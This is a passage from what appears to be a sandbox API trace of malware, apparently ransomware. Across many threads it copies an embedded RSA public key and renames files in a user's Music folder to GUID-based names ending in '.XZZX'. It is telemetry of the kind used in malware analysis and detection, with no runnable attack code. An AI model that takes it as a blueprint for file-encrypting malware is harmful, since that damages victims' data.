f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0185.178] lstrcpyW (in: lpString1=0x2aaf460, lpString2="FCD862501902E584E01CEFE81DABC9CC.XZZX" | out: lpString1="FCD862501902E584E01CEFE81DABC9CC.XZZX") returned="FCD862501902E584E01CEFE81DABC9CC.XZZX" [0185.178] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0185.179] SetErrorMode (uMode=0x1) returned 0x1 [0185.179] lstrcpyW (in: lpString1=0x2aaf860, lpString2="FCD862501902E584E01CEFE81DABC9CC.XZZX" | out: lpString1="FCD862501902E584E01CEFE81DABC9CC.XZZX") returned="FCD862501902E584E01CEFE81DABC9CC.XZZX" [0185.179] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xfe0d511d, Data2=0xee5, Data3=0x4a18, Data4=([0]=0x90, [1]=0xcb, [2]=0x5c, [3]=0x13, [4]=0x2, [5]=0x63, [6]=0xf, [7]=0xd6))) returned 0x0 [0185.179] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FCD862501902E584E01CEFE81DABC9CC.XZZX") returned 77 [0185.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0185.179] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FC5924F1044F9778FE0D511D06FA7BC0.XZZX") returned 77 [0185.179] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 679 os_tid = 0xca0 [0185.337] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0185.337] lstrcpyW (in: lpString1=0x2aaf460, lpString2="1037641408F8F044B7533AA10D10D48C.XZZX" | out: lpString1="1037641408F8F044B7533AA10D10D48C.XZZX") returned="1037641408F8F044B7533AA10D10D48C.XZZX" [0185.337] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0185.337] SetErrorMode (uMode=0x1) returned 0x1 [0185.337] lstrcpyW (in: lpString1=0x2aaf860, lpString2="1037641408F8F044B7533AA10D10D48C.XZZX" | out: lpString1="1037641408F8F044B7533AA10D10D48C.XZZX") returned="1037641408F8F044B7533AA10D10D48C.XZZX" [0185.337] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x13830cfd, Data2=0x5bba, Data3=0x47e6, Data4=([0]=0xa8, [1]=0x9c, [2]=0xf1, [3]=0xf5, [4]=0xee, [5]=0x39, [6]=0x15, [7]=0x78))) returned 0x0 [0185.337] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\1037641408F8F044B7533AA10D10D48C.XZZX") returned 96 [0185.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0185.337] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\C2D55ED219C2FF1C13830CFD1C6DE364.XZZX") returned 96 [0185.337] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 680 os_tid = 0xca4 [0185.491] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0185.491] lstrcpyW (in: lpString1=0x2aaf460, lpString2="23947E243409DC7CAF2C62063821C0C4.XZZX" | out: lpString1="23947E243409DC7CAF2C62063821C0C4.XZZX") returned="23947E243409DC7CAF2C62063821C0C4.XZZX" [0185.491] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0185.491] SetErrorMode (uMode=0x1) returned 0x1 [0185.491] lstrcpyW (in: lpString1=0x2aaf860, lpString2="23947E243409DC7CAF2C62063821C0C4.XZZX" | out: lpString1="23947E243409DC7CAF2C62063821C0C4.XZZX") returned="23947E243409DC7CAF2C62063821C0C4.XZZX" [0185.491] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x948e13cb, Data2=0x9ca7, Data3=0x4812, Data4=([0]=0xb5, [1]=0xfa, [2]=0xfc, [3]=0x10, [4]=0x96, [5]=0x9a, [6]=0xc3, [7]=0xe7))) returned 0x0 [0185.491] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\23947E243409DC7CAF2C62063821C0C4.XZZX") returned 96 [0185.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0185.491] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\7CBE9D6D2C19FBBE948E13CB2EC4E006.XZZX") returned 96 [0185.491] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 681 os_tid = 0xca8 [0185.647] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0185.647] lstrcpyW (in: lpString1=0x2aaf460, lpString2="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX" | out: lpString1="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX") returned="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX" [0185.647] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0185.647] SetErrorMode (uMode=0x1) returned 0x1 [0185.647] lstrcpyW (in: lpString1=0x2aaf860, lpString2="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX" | out: lpString1="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX") returned="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX" [0185.647] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x161cdf6f, Data2=0xf4c7, Data3=0x4d62, Data4=([0]=0xa6, [1]=0xac, [2]=0x68, [3]=0x60, [4]=0xb4, [5]=0x5e, [6]=0xc3, [7]=0x13))) returned 0x0 [0185.647] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX") returned 96 [0185.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0185.647] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\B5677B4949FD8F2E161CDF6F4CA87376.XZZX") returned 96 [0185.647] StrStrW (lpFirst="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 682 os_tid = 0xcac [0185.803] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0185.803] lstrcpyW (in: lpString1=0x2aaf460, lpString2="51A5A3C031894064FCB3CED0366624AC.XZZX" | out: lpString1="51A5A3C031894064FCB3CED0366624AC.XZZX") returned="51A5A3C031894064FCB3CED0366624AC.XZZX" [0185.803] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0185.803] SetErrorMode (uMode=0x1) returned 0x1 [0185.803] lstrcpyW (in: lpString1=0x2aaf860, lpString2="51A5A3C031894064FCB3CED0366624AC.XZZX" | out: lpString1="51A5A3C031894064FCB3CED0366624AC.XZZX") returned="51A5A3C031894064FCB3CED0366624AC.XZZX" [0185.803] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x758be644, Data2=0x6d64, Data3=0x4938, Data4=([0]=0xac, [1]=0x26, [2]=0xb4, [3]=0x8d, [4]=0x5f, [5]=0x8a, [6]=0xbd, [7]=0xa7))) returned 0x0 [0185.803] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\51A5A3C031894064FCB3CED0366624AC.XZZX") returned 96 [0185.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0185.803] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\7BB0E6901F4971E0758BE64421F45628.XZZX") returned 96 [0185.803] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 683 os_tid = 0xcb0 [0185.959] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0185.959] lstrcpyW (in: lpString1=0x2aaf460, lpString2="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" | out: lpString1="54E892FC383D1FA0EE2D03953C6A03E8.XZZX") returned="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" [0185.959] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0185.959] SetErrorMode (uMode=0x1) returned 0x1 [0185.959] lstrcpyW (in: lpString1=0x2aaf860, lpString2="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" | out: lpString1="54E892FC383D1FA0EE2D03953C6A03E8.XZZX") returned="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" [0185.959] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x970b7e58, Data2=0x27ac, Data3=0x4ea0, Data4=([0]=0x8c, [1]=0xa6, [2]=0x15, [3]=0xdd, [4]=0xed, [5]=0x75, [6]=0x2b, [7]=0x8f))) returned 0x0 [0185.959] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\54E892FC383D1FA0EE2D03953C6A03E8.XZZX") returned 96 [0185.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0185.959] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\3BF84B200C2F3380970B7E580EDA17C8.XZZX") returned 96 [0185.959] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 684 os_tid = 0xcb4 [0186.115] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0186.115] lstrcpyW (in: lpString1=0x2aaf460, lpString2="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" | out: lpString1="6D35692C49D86B1ADE80FADA4DF04F62.XZZX") returned="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" [0186.115] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0186.115] SetErrorMode (uMode=0x1) returned 0x1 [0186.115] lstrcpyW (in: lpString1=0x2aaf860, lpString2="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" | out: lpString1="6D35692C49D86B1ADE80FADA4DF04F62.XZZX") returned="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" [0186.115] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x9a10c593, Data2=0x1747, Data3=0x454a, Data4=([0]=0xa9, [1]=0xed, [2]=0xf7, [3]=0x25, [4]=0x13, [5]=0x7f, [6]=0x71, [7]=0x8a))) returned 0x0 [0186.115] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\6D35692C49D86B1ADE80FADA4DF04F62.XZZX") returned 96 [0186.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0186.115] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\3C6700C5064CDD869A10C59308F7C1CE.XZZX") returned 96 [0186.115] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 685 os_tid = 0xcb8 [0186.277] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0186.289] lstrcpyW (in: lpString1=0x2aaf460, lpString2="A191878831212978B3B60CE1354E0DC0.XZZX" | out: lpString1="A191878831212978B3B60CE1354E0DC0.XZZX") returned="A191878831212978B3B60CE1354E0DC0.XZZX" [0186.289] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0186.289] SetErrorMode (uMode=0x1) returned 0x1 [0186.289] lstrcpyW (in: lpString1=0x2aaf860, lpString2="A191878831212978B3B60CE1354E0DC0.XZZX" | out: lpString1="A191878831212978B3B60CE1354E0DC0.XZZX") returned="A191878831212978B3B60CE1354E0DC0.XZZX" [0186.289] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x53f72177, Data2=0x600d, Data3=0x4688, Data4=([0]=0xb5, [1]=0x36, [2]=0xc8, [3]=0x58, [4]=0x55, [5]=0x97, [6]=0x92, [7]=0xf1))) returned 0x0 [0186.289] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\A191878831212978B3B60CE1354E0DC0.XZZX") returned 96 [0186.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0186.289] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\F019530B1A7694E853F721771D217930.XZZX") returned 96 [0186.289] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 686 os_tid = 0xcbc [0186.428] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 